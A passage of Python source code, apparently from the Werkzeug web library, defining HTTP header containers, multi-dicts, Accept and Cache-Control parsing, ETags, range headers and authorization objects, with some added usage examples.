keyword arguments were added for :mod:`wsgiref` compatibility.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
self._list.append((_key, _value))
def _validate_value(self, value):
if not isinstance(value, text_type):
raise TypeError('Value should be unicode.')
if u'\n' in value or u'\r' in value:
raise ValueError('Detected newline in header value. This is '
'a potential security problem')
def add_header(self, _key, _value, **_kw):
"""Add a new header tuple to the list.
An alias for :meth:`add` for compatibility with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.add_header` method.
"""
self.add(_key, _value, **_kw)
def clear(self):
"""Clears all headers."""
del self._list[:]
def set(self, _key, _value, **kw):
"""Remove all header tuples for `key` and add a new one. The newly
added key either appears at the end of the list if there was no
entry or replaces the first one.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes. See :meth:`add` for
more information.
.. versionchanged:: 0.6.1
:meth:`set` now accepts the same arguments as :meth:`add`.
:param key: The key to be inserted.
:param value: The value to be inserted.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
if not self._list:
self._list.append((_key, _value))
return
listiter = iter(self._list)
ikey = _key.lower()
for idx, (old_key, old_value) in enumerate(listiter):
if old_key.lower() == ikey:
                # replace first occurrence
self._list[idx] = (_key, _value)
break
else:
self._list.append((_key, _value))
return
self._list[idx + 1:] = [t for t in listiter if t[0].lower() != ikey]
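    # Illustrative sketch (added; not part of the original module): ``set``
    # collapses all existing entries for the key into a single new one,
    # whereas ``add`` would have appended another entry.
    #
    # >>> h = Headers([('X-Tag', 'a'), ('X-Tag', 'b')])
    # >>> h.set('X-Tag', 'c')
    # >>> h.getlist('X-Tag') == ['c']
    # True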
def setdefault(self, key, value):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key in self:
return self[key]
self.set(key, value)
return value
def __setitem__(self, key, value):
"""Like :meth:`set` but also supports index/slice based setting."""
if isinstance(key, (slice, integer_types)):
if isinstance(key, integer_types):
value = [value]
value = [(k, _unicodify_header_value(v)) for (k, v) in value]
[self._validate_value(v) for (k, v) in value]
if isinstance(key, integer_types):
self._list[key] = value[0]
else:
self._list[key] = value
else:
self.set(key, value)
def to_list(self, charset='iso-8859-1'):
"""Convert the headers into a list suitable for WSGI."""
from warnings import warn
warn(DeprecationWarning('Method removed, use to_wsgi_list instead'),
stacklevel=2)
return self.to_wsgi_list()
def to_wsgi_list(self):
"""Convert the headers into a list suitable for WSGI.
The values are byte strings in Python 2 converted to latin1 and unicode
strings in Python 3 for the WSGI server to encode.
:return: list
"""
if PY2:
return [(to_native(k), v.encode('latin1')) for k, v in self]
return list(self)
def copy(self):
return self.__class__(self._list)
def __copy__(self):
return self.copy()
def __str__(self):
"""Returns formatted headers suitable for HTTP transmission."""
strs = []
for key, value in self.to_wsgi_list():
strs.append('%s: %s' % (key, value))
strs.append('\r\n')
return '\r\n'.join(strs)
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
list(self)
)
class ImmutableHeadersMixin(object):
"""Makes a :class:`Headers` immutable. We do not mark them as
    hashable though since the only use case for this data structure
in Werkzeug is a view on a mutable structure.
.. versionadded:: 0.5
:private:
"""
def __delitem__(self, key):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
set = __setitem__
def add(self, item):
is_immutable(self)
remove = add_header = add
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def popitem(self):
is_immutable(self)
def setdefault(self, key, default):
is_immutable(self)
class EnvironHeaders(ImmutableHeadersMixin, Headers):
"""Read only version of the headers from a WSGI environment. This
provides the same interface as `Headers` and is constructed from
a WSGI environment.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for
HTTP exceptions.
"""
def __init__(self, environ):
self.environ = environ
def __eq__(self, other):
return self.environ is other.environ
def __getitem__(self, key, _get_mode=False):
# _get_mode is a no-op for this class as there is no index but
# used because get() calls it.
key = key.upper().replace('-', '_')
if key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
return _unicodify_header_value(self.environ[key])
return _unicodify_header_value(self.environ['HTTP_' + key])
def __len__(self):
# the iter is necessary because otherwise list calls our
# len which would call list again and so forth.
return len(list(iter(self)))
def __iter__(self):
for key, value in iteritems(self.environ):
if key.startswith('HTTP_') and key not in \
('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'):
yield (key[5:].replace('_', '-').title(),
_unicodify_header_value(value))
elif key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
yield (key.replace('_', '-').title(),
_unicodify_header_value(value))
def copy(self):
raise TypeError('cannot create %r copies' % self.__class__.__name__)
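# Illustrative sketch (added; not part of the original module): headers are
# read straight out of a (sample) WSGI environ dict.
#
# >>> env = {'HTTP_X_TOKEN': 'abc', 'CONTENT_TYPE': 'text/plain'}
# >>> headers = EnvironHeaders(env)
# >>> headers['X-Token'] == 'abc'
# True
# >>> len(headers)
# 2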
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class CombinedMultiDict(ImmutableMultiDictMixin, MultiDict):
"""A read only :class:`MultiDict` that you can pass multiple :class:`MultiDict`
instances as sequence and it will combine the return values of all wrapped
dicts:
>>> from werkzeug.datastructures import CombinedMultiDict, MultiDict
>>> post = MultiDict([('foo', 'bar')])
>>> get = MultiDict([('blub', 'blah')])
>>> combined = CombinedMultiDict([get, post])
>>> combined['foo']
'bar'
>>> combined['blub']
'blah'
This works for all read operations and will raise a `TypeError` for
methods that usually change data which isn't possible.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
"""
def __reduce_ex__(self, protocol):
return type(self), (self.dicts,)
def __init__(self, dicts=None):
self.dicts = dicts or []
@classmethod
def fromkeys(cls):
raise TypeError('cannot create %r instances by fromkeys' %
cls.__name__)
def __getitem__(self, key):
for d in self.dicts:
if key in d:
return d[key]
raise exceptions.BadRequestKeyError(key)
def get(self, key, default=None, type=None):
for d in self.dicts:
if key in d:
if type is not None:
try:
return type(d[key])
except ValueError:
continue
return d[key]
return default
def getlist(self, key, type=None):
rv = []
for d in self.dicts:
rv.extend(d.getlist(key, type))
return rv
def keys(self):
rv = set()
for d in self.dicts:
rv.update(d.keys())
return iter(rv)
__iter__ = keys
def items(self, multi=False):
found = set()
for d in self.dicts:
for key, value in iteritems(d, multi):
if multi:
yield key, value
elif key not in found:
found.add(key)
yield key, value
def values(self):
for key, value in iteritems(self):
yield value
def lists(self):
rv = {}
for d in self.dicts:
for key, values in iterlists(d):
rv.setdefault(key, []).extend(values)
return iteritems(rv)
def listvalues(self):
return (x[1] for x in self.lists())
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self.dicts[:])
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first item for each key.
:return: a :class:`dict`
"""
rv = {}
for d in reversed(self.dicts):
rv.update(d.to_dict(flat))
return rv
def __len__(self):
return len(self.keys())
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.dicts)
class FileMultiDict(MultiDict):
"""A special :class:`MultiDict` that has convenience methods to add
files to it. This is used for :class:`EnvironBuilder` and generally
    useful for unit testing.
.. versionadded:: 0.5
"""
def add_file(self, name, file, filename=None, content_type=None):
"""Adds a new file to the dict. `file` can be a file name or
a :class:`file`-like or a :class:`FileStorage` object.
:param name: the name of the field.
:param file: a filename or :class:`file`-like object
:param filename: an optional filename
:param content_type: an optional content type
"""
if isinstance(file, FileStorage):
value = file
else:
if isinstance(file, string_types):
if filename is None:
filename = file
file = open(file, 'rb')
if filename and content_type is None:
content_type = mimetypes.guess_type(filename)[0] or \
'application/octet-stream'
value = FileStorage(file, filename, name, content_type)
self.add(name, value)
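# Illustrative sketch (added; not part of the original module): the content
# type is guessed from the file name when none is given; ``BytesIO`` stands in
# for a real upload and ``FileStorage`` is defined further down in this module.
#
# >>> from io import BytesIO
# >>> d = FileMultiDict()
# >>> d.add_file('avatar', BytesIO(b'data'), filename='avatar.png')
# >>> d['avatar'].filename == 'avatar.png'
# True
# >>> d['avatar'].content_type == 'image/png'
# True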
class ImmutableDict(ImmutableDictMixin, dict):
"""An immutable :class:`dict`.
.. versionadded:: 0.5
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return dict(self)
def __copy__(self):
return self
class ImmutableMultiDict(ImmutableMultiDictMixin, MultiDict):
"""An immutable :class:`MultiDict`.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return MultiDict(self)
def __copy__(self):
return self
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, OrderedMultiDict):
"""An immutable :class:`OrderedMultiDict`.
.. versionadded:: 0.6
"""
def _iter_hashitems(self):
return enumerate(iteritems(self, multi=True))
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return OrderedMultiDict(self)
def __copy__(self):
return self
@native_itermethods(['values'])
class Accept(ImmutableList):
"""An :class:`Accept` object is just a list subclass for lists of
``(value, quality)`` tuples. It is automatically sorted by quality.
    All :class:`Accept` objects work similarly to a list but provide extra
functionality for working with the data. Containment checks are
normalized to the rules of that header:
>>> a = CharsetAccept([('ISO-8859-1', 1), ('utf-8', 0.7)])
>>> a.best
'ISO-8859-1'
>>> 'iso-8859-1' in a
True
>>> 'UTF8' in a
True
>>> 'utf7' in a
False
To get the quality for an item you can use normal item lookup:
>>> print a['utf-8']
0.7
>>> a['utf7']
0
.. versionchanged:: 0.5
:class:`Accept` objects are forced immutable now.
"""
def __init__(self, values=()):
if values is None:
list.__init__(self)
self.provided = False
elif isinstance(values, Accept):
self.provided = values.provided
list.__init__(self, values)
else:
self.provided = True
values = [(a, b) for b, a in values]
values.sort()
values.reverse()
list.__init__(self, [(a, b) for b, a in values])
def _value_matches(self, value, item):
"""Check if a value matches a given accept item."""
return item == '*' or item.lower() == value.lower()
def __getitem__(self, key):
"""Besides index lookup (getting item n) you can also pass it a string
to get the quality for the item. If the item is not in the list, the
returned quality is ``0``.
"""
if isinstance(key, string_types):
return self.quality(key)
return list.__getitem__(self, key)
def quality(self, key):
"""Returns the quality of the key.
.. versionadded:: 0.6
In previous versions you had to use the item-lookup syntax
(eg: ``obj[key]`` instead of ``obj.quality(key)``)
"""
for item, quality in self:
if self._value_matches(key, item):
return quality
return 0
def __contains__(self, value):
for item, quality in self:
if self._value_matches(value, item):
return True
return False
def __repr__(self):
return '%s([%s])' % (
self.__class__.__name__,
', '.join('(%r, %s)' % (x, y) for x, y in self)
)
def index(self, key):
"""Get the position of an entry or raise :exc:`ValueError`.
:param key: The key to be looked up.
.. versionchanged:: 0.5
This used to raise :exc:`IndexError`, which was inconsistent
with the list API.
"""
if isinstance(key, string_types):
for idx, (item, quality) in enumerate(self):
if self._value_matches(key, item):
return idx
raise ValueError(key)
return list.index(self, key)
def find(self, key):
"""Get the position of an entry or return -1.
:param key: The key to be looked up.
"""
try:
return self.index(key)
except ValueError:
return -1
def values(self):
"""Iterate over all values."""
for item in self:
yield item[0]
def to_header(self):
"""Convert the header set into an HTTP header string."""
result = []
for value, quality in self:
if quality != 1:
value = '%s;q=%s' % (value, quality)
result.append(value)
return ','.join(result)
def __str__(self):
return self.to_header()
def best_match(self, matches, default=None):
"""Returns the best match from a list of possible matches based
        on the quality of the client. If two items have the same quality,
        the one that comes first is returned.
:param matches: a list of matches to check for
:param default: the value that is returned if none match
"""
best_quality = -1
result = default
for server_item in matches:
for client_item, quality in self:
if quality <= best_quality:
break
if self._value_matches(server_item, client_item):
best_quality = quality
result = server_item
return result
@property
def best(self):
"""The best match as value."""
if self:
return self[0][0]
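# --- illustrative usage sketch (editor-added) ---
# Constructing an Accept list from (value, quality) pairs, then using the
# quality lookup and best_match selection described in the docstrings above.
def _accept_example():
    accept = Accept([('text/html', 1), ('application/json', 0.8)])
    json_quality = accept.quality('application/json')            # 0.8
    best = accept.best_match(['application/json', 'text/plain'],
                             default='text/plain')               # 'application/json'
    return json_quality, best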
class MIMEAccept(Accept):
"""Like :class:`Accept` but with special methods and behavior for
mimetypes.
"""
def _value_matches(self, value, item):
def _normalize(x):
x = x.lower()
return x == '*' and ('*', '*') or x.split('/', 1)
# this is from the application which is trusted. to avoid developer
# frustration we actually check these for valid values
if '/' not in value:
raise ValueError('invalid mimetype %r' % value)
value_type, value_subtype = _normalize(value)
if value_type == '*' and value_subtype != '*':
raise ValueError('invalid mimetype %r' % value)
if '/' not in item:
return False
item_type, item_subtype = _normalize(item)
if item_type == '*' and item_subtype != '*':
return False
return (
(item_type == item_subtype == '*' or
value_type == value_subtype == '*') or
(item_type == value_type and (item_subtype == '*' or
value_subtype == '*' or
item_subtype == value_subtype))
)
@property
def accept_html(self):
"""True if this object accepts HTML."""
return (
'text/html' in self or
'application/xhtml+xml' in self or
self.accept_xhtml
)
@property
def accept_xhtml(self):
"""True if this object accepts XHTML."""
return (
'application/xhtml+xml' in self or
'application/xml' in self
)
@property
def accept_json(self):
"""True if this object accepts JSON."""
return 'application/json' in self
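# --- illustrative usage sketch (editor-added) ---
# MIMEAccept validates server-side mimetypes and lets client-side wildcards
# match concrete types.
def _mimeaccept_example():
    accept = MIMEAccept([('text/*', 1), ('application/json', 0.5)])
    assert 'text/html' in accept                                  # matched by text/*
    best = accept.best_match(['application/json', 'image/png'])   # 'application/json'
    return best, accept.accept_json                               # (..., True)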
class LanguageAccept(Accept):
"""Like :class:`Accept` but with normalization for languages."""
def _value_matches(self, value, item):
def _normalize(language):
return _locale_delim_re.split(language.lower())
return item == '*' or _normalize(value) == _normalize(item)
class CharsetAccept(Accept):
"""Like :class:`Accept` but with normalization for charsets."""
def _value_matches(self, value, item):
def _normalize(name):
try:
return codecs.lookup(name).name
except LookupError:
return name.lower()
return item == '*' or _normalize(value) == _normalize(item)
def cache_property(key, empty, type):
"""Return a new property object for a cache header. Useful if you
want to add support for a cache extension in a subclass."""
return property(lambda x: x._get_cache_value(key, empty, type),
lambda x, v: x._set_cache_value(key, v, type),
lambda x: x._del_cache_value(key),
'accessor for %r' % key)
class _CacheControl(UpdateDictMixin, dict):
"""Subclass of a dict that stores values for a Cache-Control header. It
has accessors for all the cache-control directives specified in RFC 2616.
The class does not differentiate between request and response directives.
    Because the cache-control directives in the HTTP header use dashes, the
    Python descriptors use underscores instead.
To get a header of the :class:`CacheControl` object again you can convert
the object into a string or call the :meth:`to_header` method. If you plan
to subclass it and add your own items have a look at the sourcecode for
that class.
.. versionchanged:: 0.4
Setting `no_cache` or `private` to boolean `True` will set the implicit
none-value which is ``*``:
>>> cc = ResponseCacheControl()
>>> cc.no_cache = True
>>> cc
<ResponseCacheControl 'no-cache'>
>>> cc.no_cache
'*'
>>> cc.no_cache = None
>>> cc
<ResponseCacheControl ''>
In versions before 0.5 the behavior documented here affected the now
no longer existing `CacheControl` class.
"""
no_cache = cache_property('no-cache', '*', None)
no_store = cache_property('no-store', None, bool)
max_age = cache_property('max-age', -1, int)
no_transform = cache_property('no-transform', None, None)
def __init__(self, values=(), on_update=None):
dict.__init__(self, values or ())
self.on_update = on_update
self.provided = values is not None
def _get_cache_value(self, key, empty, type):
"""Used internally by the accessor properties."""
if type is bool:
return key in self
if key in self:
value = self[key]
if value is None:
return empty
elif type is not None:
try:
value = type(value)
except ValueError:
pass
return value
def _set_cache_value(self, key, value, type):
"""Used internally by the accessor properties."""
if type is bool:
if value:
self[key] = None
else:
self.pop(key, None)
else:
if value is None:
self.pop(key)
elif value is True:
self[key] = None
else:
self[key] = value
def _del_cache_value(self, key):
"""Used internally by the accessor properties."""
if key in self:
del self[key]
def to_header(self):
"""Convert the stored values into a cache control header."""
return dump_header(self)
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
class RequestCacheControl(ImmutableDictMixin, _CacheControl):
"""A cache control for requests. This is immutable and gives access
to all the request-relevant cache control headers.
To get a header of the :class:`RequestCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
max_stale = cache_property('max-stale', '*', int)
min_fresh = cache_property('min-fresh', '*', int)
no_transform = cache_property('no-transform', None, None)
only_if_cached = cache_property('only-if-cached', None, bool)
class ResponseCacheControl(_CacheControl):
"""A cache control for responses. Unlike :class:`RequestCacheControl`
this is mutable and gives access to response-relevant cache control
headers.
To get a header of the :class:`ResponseCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
public = cache_property('public', None, bool)
private = cache_property('private', '*', None)
must_revalidate = cache_property('must-revalidate', None, bool)
proxy_revalidate = cache_property('proxy-revalidate', None, bool)
s_maxage = cache_property('s-maxage', None, None)
# attach cache_property to the _CacheControl as staticmethod
# so that others can reuse it.
_CacheControl.cache_property = staticmethod(cache_property)
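# --- illustrative usage sketch (editor-added) ---
# Building a Cache-Control header with ResponseCacheControl and adding an
# extension directive through cache_property, as its docstring suggests.
# 'stale-while-revalidate' is used only as an example directive name here.
def _cache_control_example():
    cc = ResponseCacheControl()
    cc.public = True
    cc.max_age = 3600
    header_value = cc.to_header()                 # e.g. 'public, max-age=3600'
    class ExtendedCacheControl(ResponseCacheControl):
        stale_while_revalidate = cache_property('stale-while-revalidate', None, int)
    ext = ExtendedCacheControl()
    ext.stale_while_revalidate = 30
    return header_value, ext.to_header()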
class CallbackDict(UpdateDictMixin, dict):
"""A dict that calls a function passed every time something is changed.
The function is passed the dict instance.
"""
def __init__(self, initial=None, on_update=None):
dict.__init__(self, initial or ())
self.on_update = on_update
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
dict.__repr__(self)
)
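# --- illustrative usage sketch (editor-added) ---
# CallbackDict calls on_update with the dict itself after every change,
# which is how header-backed structures elsewhere in this module stay in
# sync with their serialized form.
def _callbackdict_example():
    changes = []
    d = CallbackDict({'a': 1}, on_update=lambda m: changes.append(dict(m)))
    d['b'] = 2           # triggers on_update
    del d['a']           # triggers it again
    return changes       # [{'a': 1, 'b': 2}, {'b': 2}]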
class HeaderSet(object):
"""Similar to the :class:`ETags` class this implements a set-like structure.
Unlike :class:`ETags` this is case insensitive and used for vary, allow, and
content-language headers.
If not constructed using the :func:`parse_set_header` function the
instantiation works like this:
>>> hs = HeaderSet(['foo', 'bar', 'baz'])
>>> hs
HeaderSet(['foo', 'bar', 'baz'])
"""
def __init__(self, headers=None, on_update=None):
self._headers = list(headers or ())
self._set = set([x.lower() for x in self._headers])
self.on_update = on_update
def add(self, header):
"""Add a new header to the set."""
self.update((header,))
def remove(self, header):
"""Remove a header from the set. This raises an :exc:`KeyError` if the
header is not in the set.
.. versionchanged:: 0.5
            In older versions an :exc:`IndexError` was raised instead of a
:exc:`KeyError` if the object was missing.
:param header: the header to be removed.
"""
key = header.lower()
if key not in self._set:
raise KeyError(header)
self._set.remove(key)
for idx, key in enumerate(self._headers):
if key.lower() == header:
del self._headers[idx]
break
if self.on_update is not None:
self.on_update(self)
def update(self, iterable):
"""Add all the headers from the iterable to the set.
:param iterable: updates the set with the items from the iterable.
"""
inserted_any = False
for header in iterable:
key = header.lower()
if key not in self._set:
self._headers.append(header)
self._set.add(key)
inserted_any = True
if inserted_any and self.on_update is not None:
self.on_update(self)
def discard(self, header):
"""Like :meth:`remove` but ignores errors.
:param header: the header to be discarded.
"""
try:
return self.remove(header)
except KeyError:
pass
def find(self, header):
"""Return the index of the header in the set or return -1 if not found.
:param header: the header to be looked up.
"""
header = header.lower()
for idx, item in enumerate(self._headers):
if item.lower() == header:
return idx
return -1
def index(self, header):
"""Return the index of the header in the set or raise an
:exc:`IndexError`.
:param header: the header to be looked up.
"""
rv = self.find(header)
if rv < 0:
raise IndexError(header)
return rv
def clear(self):
"""Clear the set."""
self._set.clear()
del self._headers[:]
if self.on_update is not None:
self.on_update(self)
def as_set(self, preserve_casing=False):
"""Return the set as real python set type. When calling this, all
the items are converted to lowercase and the ordering is lost.
:param preserve_casing: if set to `True` the items in the set returned
will have the original case like in the
:class:`HeaderSet`, otherwise they will
be lowercase.
"""
if preserve_casing:
return set(self._headers)
return set(self._set)
def to_header(self):
"""Convert the header set into an HTTP header string."""
return ', '.join(map(quote_header_value, self._headers))
def __getitem__(self, idx):
return self._headers[idx]
def __delitem__(self, idx):
rv = self._headers.pop(idx)
self._set.remove(rv.lower())
if self.on_update is not None:
self.on_update(self)
def __setitem__(self, idx, value):
old = self._headers[idx]
self._set.remove(old.lower())
self._headers[idx] = value
self._set.add(value.lower())
if self.on_update is not None:
self.on_update(self)
def __contains__(self, header):
return header.lower() in self._set
def __len__(self):
return len(self._set)
def __iter__(self):
return iter(self._headers)
def __nonzero__(self):
return bool(self._set)
def __str__(self):
return self.to_header()
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self._headers
)
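# --- illustrative usage sketch (editor-added) ---
# HeaderSet keeps the original casing for serialization while treating
# membership checks case-insensitively, as needed for Vary/Allow headers.
def _headerset_example():
    vary = HeaderSet(['Accept-Encoding'])
    vary.add('Cookie')
    assert 'cookie' in vary                  # case-insensitive membership
    return vary.to_header()                  # 'Accept-Encoding, Cookie'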
class ETags(object):
"""A set that can be used to check if one etag is present in a collection
of etags.
"""
def __init__(self, strong_etags=None, weak_etags=None, star_tag=False):
self._strong = frozenset(not star_tag and strong_etags or ())
self._weak = frozenset(weak_etags or ())
self.star_tag = star_tag
def as_set(self, include_weak=False):
"""Convert the `ETags` object into a python set. Per default all the
weak etags are not part of this set."""
rv = set(self._strong)
if include_weak:
rv.update(self._weak)
return rv
def is_weak(self, etag):
"""Check if an etag is weak."""
return etag in self._weak
def contains_weak(self, etag):
"""Check if an etag is part of the set including weak and strong tags."""
return self.is_weak(etag) or self.contains(etag)
def contains(self, etag):
"""Check if an etag is part of the set ignoring weak tags.
It is also possible to use the ``in`` operator.
"""
if self.star_tag:
return True
return etag in self._strong
def contains_raw(self, etag):
"""When passed a quoted tag it will check if this tag is part of the
set. If the tag is weak it is checked against weak and strong tags,
otherwise strong only."""
etag, weak = unquote_etag(etag)
if weak:
return self.contains_weak(etag)
return self.contains(etag)
def to_header(self):
"""Convert the etags set into a HTTP header string."""
if self.star_tag:
return '*'
return ', '.join(
['"%s"' % x for x in self._strong] +
['w/"%s"' % x for x in self._weak]
)
def __call__(self, etag=None, data=None, include_weak=False):
if [etag, data].count(None) != 1:
            raise TypeError('exactly one of etag or data must be provided')
if etag is None:
etag = generate_etag(data)
if include_weak:
if etag in self._weak:
return True
return etag in self._strong
def __nonzero__(self):
return bool(self.star_tag or self._strong or self._weak)
def __str__(self):
return self.to_header()
def __iter__(self):
return iter(self._strong)
def __contains__(self, etag):
return self.contains(etag)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
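# --- illustrative usage sketch (editor-added) ---
# Strong tags take part in normal containment checks; weak tags are only
# visible through the weak-aware helpers.
def _etags_example():
    etags = ETags(strong_etags=['abc'], weak_etags=['def'])
    assert 'abc' in etags                    # strong match
    assert not etags.contains('def')         # weak tags ignored here
    assert etags.contains_weak('def')
    return etags.to_header()                 # '"abc", w/"def"'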
class IfRange(object):
"""Very simple object that represents the `If-Range` header in parsed
    form. It will have either an etag or a date, or neither of them, but
    never both.
.. versionadded:: 0.7
"""
def __init__(self, etag=None, date=None):
#: The etag parsed and unquoted. Ranges always operate on strong
#: etags so the weakness information is not necessary.
self.etag = etag
#: The date in parsed format or `None`.
self.date = date
def to_header(self):
"""Converts the object back into an HTTP header."""
if self.date is not None:
return http_date(self.date)
if self.etag is not None:
return quote_etag(self.etag)
return ''
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Range(object):
"""Represents a range header. All the methods are only supporting bytes
as unit. It does store multiple ranges but :meth:`range_for_length` will
only work if only one range is provided.
.. versionadded:: 0.7
"""
def __init__(self, units, ranges):
#: The units of this range. Usually "bytes".
self.units = units
#: A list of ``(begin, end)`` tuples for the range header provided.
#: The ranges are non-inclusive.
self.ranges = ranges
def range_for_length(self, length):
"""If the range is for bytes, the length is not None and there is
exactly one range and it is satisfiable it returns a ``(start, stop)``
tuple, otherwise `None`.
"""
if self.units != 'bytes' or length is None or len(self.ranges) != 1:
return None
start, end = self.ranges[0]
if end is None:
end = length
if start < 0:
start += length
if is_byte_range_valid(start, end, length):
return start, min(end, length)
def make_content_range(self, length):
"""Creates a :class:`~werkzeug.datastructures.ContentRange` object
from the current range and given content length.
"""
rng = self.range_for_length(length)
if rng is not None:
return ContentRange(self.units, rng[0], rng[1], length)
def to_header(self):
"""Converts the object back into an HTTP header."""
ranges = []
for begin, end in self.ranges:
if end is None:
ranges.append(begin >= 0 and '%s-' % begin or str(begin))
else:
ranges.append('%s-%s' % (begin, end - 1))
return '%s=%s' % (self.units, ','.join(ranges))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
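# --- illustrative usage sketch (editor-added) ---
# Ranges are stored as non-inclusive (begin, end) tuples; end=None means
# "until the end of the resource".
def _range_example():
    rng = Range('bytes', [(0, 500)])
    assert rng.to_header() == 'bytes=0-499'
    assert rng.range_for_length(1000) == (0, 500)
    open_ended = Range('bytes', [(500, None)])
    return open_ended.range_for_length(1000)     # (500, 1000)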
class ContentRange(object):
"""Represents the content range header.
.. versionadded:: 0.7
"""
def __init__(self, units, start, stop, length=None, on_update=None):
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self.on_update = on_update
self.set(start, stop, length, units)
def _callback_property(name):
def fget(self):
return getattr(self, name)
def fset(self, value):
setattr(self, name, value)
if self.on_update is not None:
self.on_update(self)
return property(fget, fset)
#: The units to use, usually "bytes"
units = _callback_property('_units')
#: The start point of the range or `None`.
start = _callback_property('_start')
#: The stop point of the range (non-inclusive) or `None`. Can only be
#: `None` if also start is `None`.
stop = _callback_property('_stop')
#: The length of the range or `None`.
length = _callback_property('_length')
def set(self, start, stop, length=None, units='bytes'):
"""Simple method to update the ranges."""
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self._units = units
self._start = start
self._stop = stop
self._length = length
if self.on_update is not None:
self.on_update(self)
def unset(self):
"""Sets the units to `None` which indicates that the header should
no longer be used.
"""
self.set(None, None, units=None)
def to_header(self):
if self.units is None:
return ''
if self.length is None:
length = '*'
else:
length = self.length
if self.start is None:
return '%s */%s' % (self.units, length)
return '%s %s-%s/%s' % (
self.units,
self.start,
self.stop - 1,
length
)
def __nonzero__(self):
return self.units is not None
__bool__ = __nonzero__
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Authorization(ImmutableDictMixin, dict):
"""Represents an `Authorization` header sent by the client. You should
not create this kind of object yourself but use it when it's returned by
the `parse_authorization_header` function.
This object is a dict subclass and can be altered by setting dict items
but it should be considered immutable as it's returned by the client and
not meant for modifications.
.. versionchanged:: 0.5
This object became immutable.
"""
def __init__(self, auth_type, data=None):
dict.__init__(self, data or {})
self.type = auth_type
username = property(lambda x: x.get('username'), doc='''
The username transmitted. This is set for both basic and digest
auth all the time.''')
password = property(lambda x: x.get('password'), doc='''
When the authentication type is basic this is the password
transmitted by the client, else `None`.''')
realm = property(lambda x: x.get('realm'), doc='''
This is the server realm sent back for HTTP digest auth.''')
nonce = property(lambda x: x.get('nonce'), doc='''
The nonce the server sent for digest auth, sent back by the client.
A nonce should be unique for every 401 response for HTTP digest
auth.''')
uri = property(lambda x: x.get('uri'), doc='''
The URI from Request-URI of the Request-Line; duplicated because
proxies are allowed to change the Request-Line in transit. HTTP
digest auth only.''')
nc = property(lambda x: x.get('nc'), doc='''
The nonce count value transmitted by clients if a qop-header is
also transmitted. HTTP digest auth only.''')
cnonce = property(lambda x: x.get('cnonce'), doc='''
If the server sent a qop-header in the ``WWW-Authenticate``
header, the client has to provide this value for HTTP digest auth.
See the RFC for more details.''')
response = property(lambda x: x.get('response'), doc='''
A string of 32 hex digits computed as defined in RFC 2617, which
proves that the user knows a password. Digest auth only.''')
opaque = property(lambda x: x.get('opaque'), doc='''
The opaque header from the server returned unchanged by the client.
It is recommended that this string be base64 or hexadecimal data.
Digest auth only.''')
@property
def qop(self):
"""Indicates what "quality of protection" the client has applied to
the message for HTTP digest auth."""
def on_update(header_set):
if not header_set and 'qop' in self:
del self['qop']
elif header_set:
self['qop'] = header_set.to_header()
return parse_set_header(self.get('qop'), on_update)
class WWWAuthenticate(UpdateDictMixin, dict):
"""Provides simple access to `WWW-Authenticate` headers."""
#: list of keys that require quoting in the generated header
_require_quoting = frozenset(['domain', 'nonce', 'opaque', 'realm'])
